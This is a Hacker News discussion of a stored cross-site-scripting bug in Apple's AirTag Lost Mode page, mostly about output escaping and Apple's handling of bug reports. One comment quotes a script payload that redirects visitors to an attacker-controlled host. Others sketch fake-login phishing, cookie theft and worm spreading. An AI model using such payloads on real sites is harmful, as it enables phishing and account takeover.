[HN Gopher] Apple AirTag Bug Enables 'Good Samaritan' Attack
       ___________________________________________________________________
        
       Apple AirTag Bug Enables 'Good Samaritan' Attack
        
       Author : kaeruct
       Score  : 311 points
       Date   : 2021-09-29 06:49 UTC (16 hours ago)
        
 (HTM) web link (krebsonsecurity.com)
 (TXT) w3m dump (krebsonsecurity.com)
        
       | twhb wrote:
       | More info: https://medium.com/@bobbyrsec/zero-day-hijacking-
       | icloud-cred...
       | 
       | After reading OP, I was under the impression this is something
       | silly, like being able to enter "Please visit badsite.xyz" in the
       | message you leave. The above makes clear that it's a real XSS,
       | the AirTag owner can run scripts on found.apple.com.
        
         | planb wrote:
         | From that page: An attacker intercepts this request, and
         | injects this malicious payload into the phone number field:
         | <script>window.location='https://10.0.1.137:8000/indexer.html';
         | var a = '';</script>
         | 
         | Really, what year is this, 2005? How is embedding unquoted user
         | input into a web page still a thing? Most modern frameworks
         | make it really hard to do this even on purpose...
        
           | rjmunro wrote:
           | This attack is far more serious than that example reveals.
           | Instead of directing user's elsewhere, you could replace the
           | contents of the page to look like an iCloud login form while
           | remaining inside the apple.com domain.
           | 
           | Depending on how the rest of Apple.com's site is configured,
           | you could steal cookies and allow yourself to login without
           | even needing a fake login page. You might be able to directly
           | manipulate and make changes to the user's account.
        
             | bayindirh wrote:
             | > Depending on how the rest of Apple.com's site is
             | configured, you could steal cookies and allow yourself to
             | login without even needing a fake login page. You might be
             | able to directly manipulate and make changes to the user's
             | account.
             | 
             | IIRC every process inside the iOS has its own cookie jar
             | and browser container, so application X cannot read iOS
             | Safari's or application Y's cookie jar or any cache in that
             | regard.
             | 
             | So, every application's web view is so-called alone on the
             | OS.
        
               | avianlyric wrote:
               | That's irrelevant. The AirTag opens a link in Safari, and
               | allows you to run efficiently arbitrary JavaScript in the
               | page that's opened (iCloud).
               | 
               | Containers and cookie jars don't help you if the
               | malicious code is running inside the container your
               | sensitive data lives in.
               | 
               | In this specific example, if the iCloud cookies are
               | marked as JS visible, and there no content security
               | policy preventing inline JS, then the JS injected could
               | grab the iCloud cookie and exfiltrate it to an attacker
               | domain.
        
             | planb wrote:
             | I wouldn't even be surprised if there are cookies for
             | *.apple.com that you can read this way...
        
             | ronsor wrote:
             | > replace the contents of the page to look like an iCloud
             | login form while remaining inside the apple.com domain
             | 
             | Indeed, and with the history.pushState() API, you can even
             | change the URL to be more realistic.
        
           | chrisjc wrote:
           | Is putting scripts in a phone number field (or any input
           | field) a well known way to hijack requests? I mean when
           | someone is trying to compromise a site, is this one of the
           | first things they try?
           | 
           | Surely (obviously not) at this point in time there has to be
           | some out-of-the-box browser-engine (webkit/blink/gecko) input
           | sanitation for widgets like "input", "textarea", etc?
           | 
           | I can only imagine this to be the case, so did an apple
           | employee go out of their way to disable this feature? Or is
           | this simply a case of the rookie developer using variable
           | substitutions in a SQL string instead of a prepared statement
           | and bindings? (SQL injection analogy)
           | 
           | ----
           | 
           | As @rjmunro mentions nextdoor, if this vulnerability exists
           | in this airtag application, might it actually be wide-spread
           | across the entire iOS and mac OS code-base? Perhaps that's
           | why Rauch heard little back from apple?
        
             | ctdonath wrote:
             | _Is putting scripts in a phone number field (or any input
             | field) a well known way to hijack requests?_
             | 
             | It's on the front page of Hacker News with clickbait
             | headline, so yeah.
        
             | jameshart wrote:
             | There's certainly not any inbuilt browser sanitation that
             | prevents you entering XSS or other injection attacks into
             | input fields. Thank goodness. If there was, how could you
             | discuss examples in web forums like this? Or use a webpage
             | to edit code?
             | 
             | XSS and other injections are not problems with data input,
             | they are problems of data output.
        
               | chrisjc wrote:
               | I'm not suggesting that it prevent you from being able to
               | enter specific strings of characters. I think I made that
               | clear by comparing this to a SQL injection issue. After
               | all, how would SQL sites and forums discuss SQL without
               | being able to store and display SQL excerpts?
               | 
               | I'm suggesting that surely these widgets and respective
               | browser engines that enable them would be mature enough
               | to not ineluctably evaluate anything that's entered.
        
               | chmod775 wrote:
               | That's not at all what's happening here. It doesn't even
               | have anything to do with input fields, except that the
               | field in the HTTP request that stores the information on
               | Apple's servers was _supposed_ to be filled from one.
               | 
               | This kind of attack essentially tricks Apple into
               | including arbitrary HTML/JavaScript in the webpage that
               | shows information when someone scans the tag. There's no
               | reliable way a browser could even know something untoward
               | was happening.
        
               | chrisjc wrote:
               | Ah! I was actually struggling to understand how inputs
               | had anything to do with it. I thought the input was being
               | rendered with some pre-populated/injected value that in
               | this case was the script.
               | <input><script.../></input>
               | 
               | Then again, if they were able to inject something into
               | the input, chances are they could inject it anywhere, so
               | as you said it has nothing to do with input fields.
               | 
               | Thanks for the clarification.
        
               | mhh__ wrote:
               | Well we are discussing it now with no issue, so clearly
               | the browser could (or could have, probably too late now)
               | picked a sensible default
        
               | chmod775 wrote:
               | Browsers aren't doing anything differently because the
               | people who write browsers happen to understand the threat
               | model.
               | 
               | You can sanitize input fields on the client all you want
               | and an attacker would still send whatever the hell they
               | felt like to the server.
        
               | sgerenser wrote:
               | Trying to sanitize on the input side reminds me of
               | Cisco's fix for a vulnerability in their routers that
               | involved disallowing requests with a user agent
               | containing "cURL".
        
               | avian wrote:
               | Imagine Stack Overflow, but without code snippets. Sounds
               | more like an idea for an art project.
               | 
               | It would probably read like early texts on mathematics
               | before modern notation was invented, where it's all just
               | textual descriptions on how to solve various problems.
        
               | gowld wrote:
               | That's another way of saying "all code input must be
               | escaped" :-)
        
               | [deleted]
        
               | mhh__ wrote:
               | Adding a flag to allow people to write stackoverlow is
               | perfectly reasonable, the default should not allow non-
               | expert programmers to waltz into issues like this.
        
               | shkkmo wrote:
               | This isn't "expert" level knowledge. This is a basic
               | principle of any client / server system.
               | 
               | In fact, including default client side protections would
               | not have fixed this issue (since this issue involved
               | bypassing client side protection.)
        
               | [deleted]
        
               | jameshart wrote:
               | The sensible default is to allow arbitrary text input and
               | pass it on correctly encoded to the next system.
               | 
               | Which is what browsers do.
        
               | [deleted]
        
             | afavour wrote:
             | The problem here is not input, it's output. Apple's web
             | backend is spitting out strings without escaping them to
             | HTML, which is a real novice error at this point in the
             | web's evolution. Sanitising inputs in browsers would be a
             | nightmare of never ending complication.
        
               | still_grokking wrote:
               | Actually you can't "sanitize" inputs as you can't know
               | upfront in which context this data will end up.
               | 
               | So the rule is: Never try to "sanitize" inputs, always
               | sanitize outputs respective to output-context.
               | 
               | Regarding XSS there is this nice overview:
               | 
               | https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter
               | _Ev...
               | 
               | As this is a complicated topic one should never try to
               | escape things "by hand", for example by some "clever"
               | regex. You won't catch this way all the possible
               | encodings!
        
             | chmod775 wrote:
             | > Surely (obviously not) at this point in time there has to
             | be some out-of-the-box browser-engine (webkit/blink/gecko)
             | input sanitation for widgets like "input", "textarea", etc?
             | 
             | Client side sanitation of _input_ fields won 't save you in
             | this case.
             | 
             | In fact it will _never_ save you.
             | 
             | Here's a "non-technical" example of why it wouldn't help,
             | without even having to go into the details of making manual
             | HTTP requests: Even if you have a browser that tries to
             | sanitize input fields so it doesn't send anything to the
             | server that causes the server to do bad things, an attacker
             | could just use a different browser, or a modified browser,
             | to send whatever the hell they wanted anyways.
             | 
             | Client side input sanitation is not security. It's just for
             | UX.
        
               | chrisjc wrote:
               | While what you're saying is true and what I said is not
               | what is actually happening, I don't think you understood
               | what I was trying to describe. And even though that's the
               | case, I may still be wrong.
               | 
               | I understand that client-side validation is only a
               | cosmetic, first-round attempt at sanitation.
               | 
               | My understanding (which is wrong) was that the malicious
               | script was being injected into the html input where it
               | was finally rendered and at the same time invoked. I was
               | suggesting that the contents of an input (the value)
               | should never be rendered (and as a result, activated) as
               | any other contents outside of an input is rendered.
               | 
               | Even if content within an input is never rendered, it
               | makes little difference since the attack is able to
               | inject the script in other places outside of an input
               | anyways.
               | 
               | So as others pointed out, nothing to do with inputs.
        
             | londons_explore wrote:
             | > might it actually be wide-spread across the entire iOS
             | and mac OS code-base?
             | 
             | I suspect this is likely. It's generally accepted that it
             | isn't possible to sanitize arbitrary user input before
             | saving it into the database. There will always be someone
             | called "<script>".
             | 
             | Instead you must format the data correctly when displaying
             | it to the user. That means every place you get data from a
             | database and process or display it, you should be using
             | framework libraries to make sure no injection attacks can
             | happen.
        
               | gowld wrote:
               | Framework libraries or languages that have types for
               | separating taintable data from executable code.
        
             | rjmunro wrote:
             | > Is putting scripts in a phone number field (or any input
             | field) a well known way to hijack requests?
             | 
             | 100% yes. It's called an XSS vulnerability. It was no 1 in
             | the Open Web Application Security Project (OWASP) Top Ten
             | 2017, although now that sites don't make this mistake very
             | often, it's fallen to number 3 in the 2021 list.
             | 
             | > ... wide-spread across the entire iOS and mac OS code-
             | base
             | 
             | It's not in the iOS or mac OS code-base, it's in the Apple
             | website codebase. It could well be widespread there.
        
             | planb wrote:
             | The input field isn't the problem here. In fact the article
             | even mentions that you need to hijack the request and alter
             | the phone number. So I guess the Apple engineer that
             | created this feature fell for the same misunderstanding
             | that you did: user input can never be trusted, even when
             | validated client side. You always have to do service side
             | validation!
        
               | chrisjc wrote:
               | Just to be clear, i wasn't suggesting that client-side
               | validation was the issue.
               | 
               | See my response above.
               | 
               | https://news.ycombinator.com/item?id=28697485
        
           | fortran77 wrote:
           | This is like bugs we used to see on "MySpace". Is Apple
           | unable to hire good people anymore given their current
           | corporate culture?
        
             | shadowfiend wrote:
             | Which culture is that?
        
             | aaaaaaaaaaab wrote:
             | Apple hires top hardware engineers, good software
             | engineers, and ok web engineers.
        
               | capableweb wrote:
               | > ok web engineers
               | 
               | How are engineers who introduce XSS issues on production
               | systems "ok" in 2021?
               | 
               | Makes me doubt the rest of your statement too. But mainly
               | because I'm actually a Apple user myself so I know for a
               | fact that neither the software nor the hardware people to
               | be "top".
        
               | frenchy wrote:
               | I can only assume they mean "ok" in the sense of "the
               | large fraction of less-sophisticated engineers who only
               | want to think about the happy paths in their code."
               | 
               | Github's co-pilot is a poor code generator, but it's a
               | fair example of how bad a lot of public code is. I'm not
               | sure private code tends to be much better in many orgs.
        
               | Abishek_Muthian wrote:
               | Apple outsources web development to low cost centers as
               | well.
        
             | consumer451 wrote:
             | Honest question: are these the results of the seemingly
             | industry-wide push to axe QA departments?
        
               | amatecha wrote:
               | Probably not. QA can't really stop devs from shipping
               | buggy code (depending on release pipeline/processes). Of
               | course a top-notch security team should have audited
               | these services and the infrastructure around them,
               | considering it's Apple...
        
               | _3u10 wrote:
               | Yup, My experience has been usually needing to give QA a
               | list of strings with SQL / script injection. As well as
               | Unicode strings with characters outside the BMP tho
               | emojis now usually cover that case.
        
               | ffhhj wrote:
               | I work in QA at one of the BIG ones on hardware/software,
               | and you would be scared how little top backend/frontend
               | devs care about security, other than pluging in some
               | common solution. I'm right now detecting vulnerabilities,
               | I'm running test cases, writing reports with clear
               | descriptions and screenshots of the holes in the system,
               | and yet I'm pretty sure all of that will go into the
               | managerial sewer because they don't want to take the
               | costs of solving it. But I'm sure if I point to the
               | company/project I'll be kicked out of my job.
        
               | moistly wrote:
               | I've worked on contracts for data integration projects
               | for both financial and healthcare providers. There is a
               | shocking lack of concern about code correctness,
               | security, privacy, etc. And code quality? Pshaw, just
               | pump out a solution, even if it's a nasty hack instead of
               | a well-considered solution.
        
           | drdaeman wrote:
           | And even if unquoted input got through, what year is this,
           | 2012? Content-Security-Policy is a thing for almost a decade.
        
       | aaaaaaaaaaab wrote:
       | Lol. The good old Bobby Tables attack.
        
       | breakingcups wrote:
       | This multi-billion dollar company is somehow managing to
       | mismanage responsible disclosure and their bug bounty program in
       | such a way that it's actually detrimental to them. It's
       | astonishing.
       | 
       | It's _so easy_ to get soft wins running a program like this.
       | Communicate with the reporter, make sure you have enough of a
       | mandate inside the company to get things fixed in time, it 's a
       | boon to your reputation even if the reporter gets to publicly
       | disclose the weakness.
       | 
       | Now they still have the public disclosure of the weakness, but
       | they get the added reputation hit of seemingly not caring, or not
       | being able to get serious security issues that jeopardize their
       | users fixed. Not a good look for a company supposedly obsessed
       | with users' privacy.
        
         | cromka wrote:
         | I wonder if the EU's next (justifiable) excuse to ride those
         | companies in court is going to be "the gross negligence to
         | protect user data". Not that anyone would expect them to ever
         | be bug-free, but those recent reports on how they handle the
         | white-hats, they really deserves to be slapped with some hefty
         | fine. And it wouldn't really be the money, but the bad
         | publicity that would _actually_ cost them something.
         | 
         | Just imagine those Google ads "mocking" iPhone's
         | "security/privacy" after them being found guilty of not giving
         | two f*cks.
         | 
         | Disclosure: saying this as a fully-invested but otherwise
         | pissed Apple user.
        
         | Svoka wrote:
         | Bug bounty programs are a mess. I once reported a bug to
         | Google. It was serious issue allowing to change 2FA and
         | password without having access to anything except "application
         | specific password" you could generate to use for POP3/IMAP
         | access.
         | 
         | When reported I was confronted by AI; unwelcoming replies "you
         | don't understand this is a feature, not a bug". But,
         | regardless, I was sent a bunch of scary emails with threats not
         | to disclose this to anyone. I gave up, I had other stuff going
         | on in my life.
         | 
         | In two years, with fanfares some "security firm" discovered a
         | bug and rolled out the full self-PR campaign with nice pictures
         | describing a bug and how they got 1337 money. At that point I
         | realized that bug bounty is only for professionals who have
         | connections and willing ears to listen to them.
         | 
         | I understand that from standpoint of big companies, they are
         | flooded with requests, but it doesn't makes me feel better. I
         | reported a serious security issue whole two years before they
         | fixed it, but got absolutely nothing for it except threats and
         | gaslighting.
        
           | todd3834 wrote:
           | I share some of this frustration. I once spent a ton of time
           | finding XSS vulnerabilities for a Delta Airlines bug bounty
           | program. One by one I would find and submit a report with
           | instructions and screenshots. Every time they would reply
           | saying they were already aware of the bug so no bounty. While
           | I don't doubt they were telling the truth it took away my
           | motivation to invest time in this type of exercise going
           | further.
        
           | volta83 wrote:
           | So what did you learn out of this, and what would you do
           | differently?
           | 
           | What do you think people should do differently when reporting
           | these issues?
        
             | handrous wrote:
             | > What do you think people should do differently when
             | reporting these issues?
             | 
             | ... sell vulns to bad actors for Monero or something?
        
             | marcosdumay wrote:
             | > So what did you learn out of this, and what would you do
             | differently?
             | 
             | The obvious lesson is "don't participate in bug hunting
             | programs".
        
             | paulryanrogers wrote:
             | These questions imply the onus is on reporters of problems.
             | I get the impression the root causes reside with the
             | companies offering half hearted big bounties.
        
               | paulryanrogers wrote:
               | ^half hearted bug bounties
        
         | prox wrote:
         | That department is probably in the navel staring face of the
         | business lifecycle, where managers are just absorbed in their
         | own world of projects and goals instead of looking out and
         | making sure the day to day work runs smoothly.
        
           | goldenkey wrote:
           | That department is essentially the red-headed stepchild.
           | Think about it, what manager would want to be in charge of a
           | team with no feature set timeline, milestones, etc? It's
           | exactly like you said, having a functional and working team
           | that gets the day to day bugs fixed, it doesn't gain any
           | clout in the company. Instead, you need to be in the AI or
           | hardware division, so you can be respected as a 'pioneer.'
           | 
           | It's all about values. Security and lets say, all submitted
           | bugs fixed within 30 days...that would be a pioneering status
           | for a company. Good luck getting approval for funding and
           | staffing for that though in a company obsessed with those
           | navel-gazing commercials about space travel and such...
        
             | prox wrote:
             | That makes me wonder if the tenure changed under Tim. Steve
             | was much more of a perfectionist.
        
               | [deleted]
        
         | [deleted]
        
       | lol768 wrote:
       | > Apple's Lost Mode doesn't currently stop users from injecting
       | arbitrary computer code into its phone number field
       | 
       | Can we be precise when writing about security vulnerabilities?
       | It's a stored XSS in the phone number field.
       | 
       | You can include precise technical details whilst still writing an
       | article suitable for a broad audience.
        
         | gowld wrote:
         | XSS isn't in the phone field. S is in the phonr field. XS is in
         | how Apple delivers the phone field value.
        
       | asiachick wrote:
       | I'm not sure I'm comvinced this is a problem. I can do th e same
       | thing just by putting QR codes on stuff. Someone is curious,
       | scans the code, clicks the link. Way cheaper to print sheets of
       | QR code stickers than $30 a pop AirTags
        
         | jmull wrote:
         | [1] is a better explanation of how this can be exploited.
         | 
         | Basically, a victim finds an air tag, and as a Good Samaritan,
         | opens the "found" link to attempt to reunite the air tag with
         | its owner. The key is, the victim may trust the Apple Airtag to
         | direct them to a secure, private web page, so may be willing to
         | do something like provide their iCloud credentials when
         | prompted.
         | 
         | It's not an attack that would be deployed indiscriminately --
         | it costs an attacker $30 for a _chance_ that a desired target
         | will find the Airtag, be a Good Samaritan and interact with the
         | "found" page as hoped. But it could make sense against high
         | value targets.
         | 
         | [1] https://medium.com/@bobbyrsec/zero-day-hijacking-icloud-
         | cred...
        
         | alexatalktome wrote:
         | I think the intended attack is to fake an apple login page with
         | the link. You open an actual apple.com page first when you find
         | a tag - so pretty safe to scan - then if you open the link
         | you'll get an apple login page. Not suspicious.
         | 
         | Now you've phished the apple credentials off someone thinking
         | they're helping find you lost keys. Less people would scan a
         | random QR code they found. And even fewer would mistake it for
         | a real apple login and feel compelled to login.
        
           | asiachick wrote:
           | I'm sure I could design codes people would scan. Ideas "dog
           | lost, scan to help". "win free iPad at Apple [Apple Logo]
           | offical back to school give-away for education [QR]" "50% off
           | Coke [QR]" etc... and just make up a domain
           | "officialapplecontest.com", "couponsforcoke.com" etc..
        
             | eCa wrote:
             | No, you can't get me to scan a qr code found in the wild.
             | 
             | It's on Apple to convince us that it is safe to scan
             | Airtags. And currently their messaging is that they don't
             | care?
             | 
             | Then I ain't scanning no Airtag.
        
               | rjmunro wrote:
               | This isn't an Airtag bug as such. This is a bug in
               | displaying user information on Apple's website, it just
               | happens to be in the part that was made for Airtags to
               | link to. It's a simple XSS vulnerability.
               | 
               | The fact that Apple let such a stupid bug into their web
               | site is worrying enough. The fact that they don't
               | acknowledge and fix it within hours, when reported to
               | them via their bounty program means that it's not just
               | "don't scan Airtags" you should be thinking, it's "don't
               | visit apple.com / icloud.com / other Apple websites"
        
               | fortran77 wrote:
               | > The fact that Apple let such a stupid bug into their
               | web site is worrying enough.
               | 
               | Those recent articles about large groups of employees
               | pushing the company to take stands on anything but work-
               | related matters makes me wonder if the sane, competent
               | employees have either left or have "mentally checked
               | out."
               | 
               | See: https://www.nytimes.com/2021/09/17/technology/apple-
               | employee...
        
             | iforgotpassword wrote:
             | Sure, you could do that an get some people to fall for
             | that. But in the end, you can just call them stupid for
             | scanning random qr codes and then entering private
             | information. No involvement by Apple.
             | 
             | An airtag is a product by a big company, claiming to be
             | trustworthy. Claiming their products are safe. You are
             | actually told by Apple to scan those airtags, made by them.
             | So you find an Apple airtag, scan it with your Apple
             | iPhone, and an Apple login form is presented to you. Way,
             | _way_ different from that qr code scenario.
        
             | [deleted]
        
             | simion314 wrote:
             | The story has 2 main ideas
             | 
             | 1 Apple is bad at security
             | 
             | 2 Apple is bad at relation with security researchers.
             | 
             | So as a fanboy you forgot to defend the second part(and the
             | zero days from last week caused by the 2nd point).
        
         | [deleted]
        
         | kataklasm wrote:
         | You know, I'm always astonished to which length people go to
         | defend Apple!
         | 
         | Apple makes a gadget that has an explicit mode for good
         | samaritans to locate the original owner. This mode has a
         | security flaw (lack of input validity checks, I thought we
         | overcame this stuff last decade?) that opens up the good
         | samaritan to abuse by means of phishing. And somehow you want
         | to explain to me that that is not a problem? Just because I can
         | take a random car and drive into people doesn't mean a self-
         | driving car having a bug that drives into people isn't an
         | issue, to give an example of why your logic doesn't pass.
        
           | throwaway287391 wrote:
           | > You know, I'm always astonished to which length people go
           | to defend Apple!
           | 
           | The reason this is a serious problem and not equivalent to
           | any other situation where you can get people to click an
           | arbitrary link wasn't immediately obvious to me either. I'm
           | glad the question was asked and answered. I'm not a diehard
           | Apple defender, just someone who's not immersed in this
           | phishing stuff on a daily basis. _shrug_
        
             | Grustaf wrote:
             | Sorry, but what is the answer? I still don't get it.
        
               | johnday wrote:
               | The answer is that a link provided by an Apple AirTag is
               | _expected_ to be secure. Indeed, a page on an apple
               | domain is _expected_ to have been vetted entirely by
               | Apple, and therefore earns a degree of trust by the good
               | samaritan.
               | 
               | As it stands, a malicious user can replace the entire
               | website, still under an apple.com domain, with content of
               | their own devising. This content can, for example,
               | pretend to be an Apple login page, and exfiltrate entered
               | credentials.
               | 
               | I hope it's obvious why this form of attack is more
               | malicious and more dangerous than simply putting up an
               | arbitrary QR code.
        
       | heytherewhat wrote:
       | They should use all that filthy money they are making from 30%
       | revenue theft on their app store to pay out their bug bounty
       | participants properly.
        
         | htk wrote:
         | Theft?
        
           | Razengan wrote:
           | "I should have access to a billion-user ecosystem and hosting
           | and serving and discoverability for free. Never mind that
           | every other platform also costs something to publish on it."
        
             | asiachick wrote:
             | It costs nothing to publish on Windows, MacOS, Linux,
             | Android (it costs to be on the play store but not to
             | publish). Plenty of free .apks on github or itch.io for
             | example). Not sure where you got this idea that "every
             | other platform also costs something to publish on it"
        
             | jjulius wrote:
             | >"I should have access ... for free."
             | 
             | OP never actually said any of that. You're assuming that
             | that's what they think, when they actually might be content
             | with a much lower percentage. Ask questions of people to
             | get clarification, as user htk did, instead of insinuating
             | they're ignorant asses.
        
               | xondono wrote:
               | Call me crazy, but if someone uses the word "theft" I
               | think it's implicit that it's not a question of degree.
               | Theft of pennies is still theft.
               | 
               | So I think it's a perfectly valid assumption that OP
               | thinks 0% is the right percentage.
        
       | vmception wrote:
       | Responsible Disclosure(tm) strikes again!
        
       | alexatalktome wrote:
       | Apples entire dev relations team needs a complete overhaul. Pour
       | money into big bounties - they have it! Then use that as
       | justification for charging 30% IAP. Also maybe be nicer to Indy
       | devs who help promote your platform.
        
       | frupert52 wrote:
       | It seems the only way to get Apple cooperate is to demonstrate
       | how this can hurt them and their product. Article headlines need
       | to be something like "Attention: Apple's Airtags are not safe to
       | scan". Written for consumer consumption then delivered as a PSA
       | to different news media. News sites and channels love to be the
       | first with this stuff too
        
       | krisoft wrote:
       | Here is a theory: Apple's response here might have been slow
       | because they misdirected the bug. This is a web stored XSS
       | vulnerability. It has nothing to do with the AirTag, other than
       | that the page is related to that device.
       | 
       | If during the triage they accidentally sent the bug to the team
       | who developed the AirTag's firmware then they might have got
       | confused and didn't handle the ticket appropriately.
       | 
       | Obviously this is not an excuse and a big company should know
       | better, but can explain why the handling was sub-optimal. Just
       | look at this very forum and the amount of confusion present in
       | the comments. There are people questioning if a stored XSS is
       | really that bad (yes it is), or asking why browsers don't
       | validate the inputs by default (wouldn't help). There is nothing
       | wrong with these questions! The problem and the solution is
       | obvious to someone who worked on web security before, but if this
       | is the first time you are wrapping your mind around the concept
       | you might mess things up. Same way as if a web developer is asked
       | to fix a kernel level buffer overflow, they won't have the right
       | mental toolset to understand the problem, let alone the ability
       | to fix it.
        
         | planb wrote:
         | Very likely. Because apple does not take bug reports seriously,
         | they probably have no team that is in charge of the whole
         | process from first evaluation to fixing the bug. As soon as the
         | issue is redirected to the responsible development team no one
         | but them cares about it anymore. This hurts the whole company,
         | especially for security issues.
        
       | julianlam wrote:
       | XSS is a special type of bug bounty report... we[0] get them
       | occasionally, and by-and-large they're easy to fix -- sanitize
       | the input on the way out.
       | 
       | What some HN commenters don't understand here is that XSS is
       | special not because it's particularly nasty (though it can be),
       | but that it can creep in without you knowing. You can be aware of
       | it, but one can still slip in if you're not actively guarding
       | against it while coding. When you have a hundred things on your
       | mind, and a complex model of frontend-backend living in your
       | brain's RAM, it's easy to forget about something like sanitizing
       | the output of user-generated content.
       | 
       | It's easy to say AFTER the fact that you should never trust user
       | input... obviously I don't, but they still happen, and I'm
       | thankful every day that pentesters check us for XSS as part of
       | our bug bounty process.
       | 
       | XSS vulns happen to a lot of developers, Apple devs included. It
       | definitely should've been caught during a code review process,
       | but the silver lining to all of this is that the fix is actually
       | rather simple... update the site to sanitize the input on the way
       | out. No firmware changes needed to the physical devices
       | themselves.
       | 
       | [0] NodeBB.org
        
         | kobalsky wrote:
         | There may be situations where a mistake is understandable
         | because it was a who-would-have-thought situation, but on this
         | scenario an effort is required to shoot yourself in the foot.
         | 
         | Apple can't be seriously using an insecure-by-default
         | templating engine to render HTML.
         | 
         | On one of my older projects I'm using a 12 year old framework
         | that already had XSS filtering by default when inserting
         | values.
        
       | rickdeckard wrote:
       | Considering that within days of the launch, a HW-researcher
       | already found a way to rewrite the AirTag to direct to an
       | entirely different URL [1], a "bad actor" might not even bother
       | with such an easily fixable webpage issue...
       | 
       | [1] https://twitter.com/ghidraninja/status/1391165711448518658
        
         | chrisjc wrote:
         | Interesting. Then again, even if apple made it immutable,
         | what's to stop bad actors from having a bunch of lookalike tags
         | manufactured with plain old NFC?
         | 
         | edit: apple has no native support for reading NFC tags. You can
         | only do it within apps. So i guess my idea wouldn't work for
         | now.
        
         | cmeacham98 wrote:
         | If I'm an attacker, I'm not using this vulnerability to
         | redirect you to an evil website, but instead to inject a fake
         | login prompt. When you go to check the domain like a good user,
         | you'll see it's on the Apple official website found.apple.com,
         | perfectly safe to enter your credentials on!
         | 
         | The ability to impersonate Apple _on their own domain_ is
         | definitely a bigger risk than rewriting the URL or
         | manufacturing a look-alike tag.
        
         | rjmunro wrote:
         | I thought the URL was displayed when you scanned an NFC before
         | you opened it. If the URL is from apple.com or icloud.com, you
         | know you can trust it. If the URL is someone else, you know not
         | to trust it.
         | 
         | An XSS can do a lot more than just redirect you. It could
         | construct a fake Apple login page inside the apple.com domain,
         | so you would have no reason to suspect it was a phishing
         | attack. You could probably construct something like the Myspace
         | Samy worm (https://en.wikipedia.org/wiki/Samy_(computer_worm))
         | to spread through Airtag users and change everyone's AirTags to
         | point to your malicious script.
        
           | chrisjc wrote:
           | > I thought the URL was displayed when you scanned an NFC
           | before you opened it. If the URL is from apple.com or
           | icloud.com, you know you can trust it. If the URL is someone
           | else, you know not to trust it.
           | 
           | While you obviously know what you're talking about, you can't
           | honestly think that the majority of people wouldn't know any
           | better? Even if most people knew better than clicking
           | nwidjjjj.biz/lkqpdi15, something like
           | youfoundmyairtag.hr/tag=238s71j would probably still fool
           | enough to make it a viable vector.
        
             | petee wrote:
             | Many people wont know, notice, or look twice. It doesnt
             | help many popular services use weird url shorteners, so
             | some weird looking url is normal now
        
           | jjulius wrote:
           | >... you know you can trust it. If the URL is someone else,
           | you know not to trust it.
           | 
           | If HN readers are the "you" here, then that's accurate. If
           | you're referring to your average person, then I would argue
           | that the majority don't know this.
        
             | rjmunro wrote:
             | Sadly that is true. Luckily, if they are using a password
             | manager, it will do the right thing.
             | 
             | Some work has been done on UX here, Apple seems to hide the
             | URL and show only the domain name on iOS sometimes, which
             | is interesting, but annoying. Firefox colour codes the
             | domain name part in the URL bar, but it's pretty subtle.
        
             | dividedbyzero wrote:
             | > If HN readers are the "you" here, then that's accurate.
             | 
             | Unless it's something very obviously shady, I could see
             | myself fall for something like this.
        
           | londons_explore wrote:
           | > construct a fake Apple login page inside the apple.com
           | domain
           | 
           | Usually you don't even need to do that. As soon as you have
           | script running inside apple.com, you can get the password
           | manager to auto-fill the password, login, steal the login
           | cookie, and do whatever you like, all with nothing visible to
           | the user.
        
             | judge2020 wrote:
             | Once it's fixed this won't be possible, in which a fake
             | Apple sign-in domain will be the best vector.
        
           | PartiallyTyped wrote:
           | Re url redirect:
           | 
           | I think you are putting too much faith in the average person
           | noticing the url given how susceptible humans are to phishing
           | attacks.
           | 
           | Re xss: how could you a worm in this case go from one airtag
           | to another?
        
             | jameshart wrote:
             | Password managers and persistent auth cookies are why
             | getting onto the domain matters.
             | 
             | I guess the posited worm would make use of the fact that if
             | an authenticated Apple.com user can inject a payload via
             | marking an air tag as lost and setting its phone number, if
             | that payload runs on an Apple.com page on the victim's
             | device, it then gets some new apple.com credentials; if the
             | victim _also_ has any airtags, it can mark them as lost and
             | inject the payload into the phone number field.
             | 
             | Requires the airtag to be scanned by another airtag owner,
             | obviously, and unclear who would scan _their_ airtag.
             | Overall, a good example of how to think about how viral
             | reproduction methods can lead to very different replication
             | rates depending on population characteristics and behavior.
        
       | Karupan wrote:
       | Apple has become too big to fail. Most customers and shareholders
       | don't care about security issues, responsible disclosure or bug
       | bounty programs. And given Apple's ultra secretive workplace
       | policies, I don't have a lot of hope that people who actually
       | care within the company can make any significant change either.
        
         | coldcode wrote:
         | Ever try to ship 1000's of SDKs and new OSs at the same time
         | every year, build new hardware, even chips, keep dev pipelines
         | going for years in advance, and keep it from being plastered
         | all over HN and reddit? It's a miracle anything works.
         | 
         | Probably it's a management nightmare to keep all this moving,
         | and clearly parts of Apple are likely poorly managed. I worked
         | there 25 years ago when it was going out of business (before
         | Steve), and it was already a complicated mess.
         | 
         | Does not of course mean they shouldn't make a bug bounty that
         | works. You'd think that someone would care in a company that
         | values privacy. But if you have to deal with 50000 different
         | simultaneous issues some are likely to fall through the cracks.
         | 
         | My last job was at a huge company with even more employees (not
         | tech but built a lot in-house) and you'd be amazed at how much
         | crap is never addressed that seemed obvious to us low level
         | people.
        
         | ryanlol wrote:
         | > Most customers and shareholders don't care about security
         | issues, responsible disclosure or bug bounty programs.
         | 
         | This applies to just about every company.
        
       | chmod775 wrote:
       | If this keeps up in about another week I'll run out of fingers to
       | count the number of security issues Apple has mismanaged recently
       | - that we know about.
        
         | [deleted]
        
       ___________________________________________________________________
       (page generated 2021-09-29 23:02 UTC)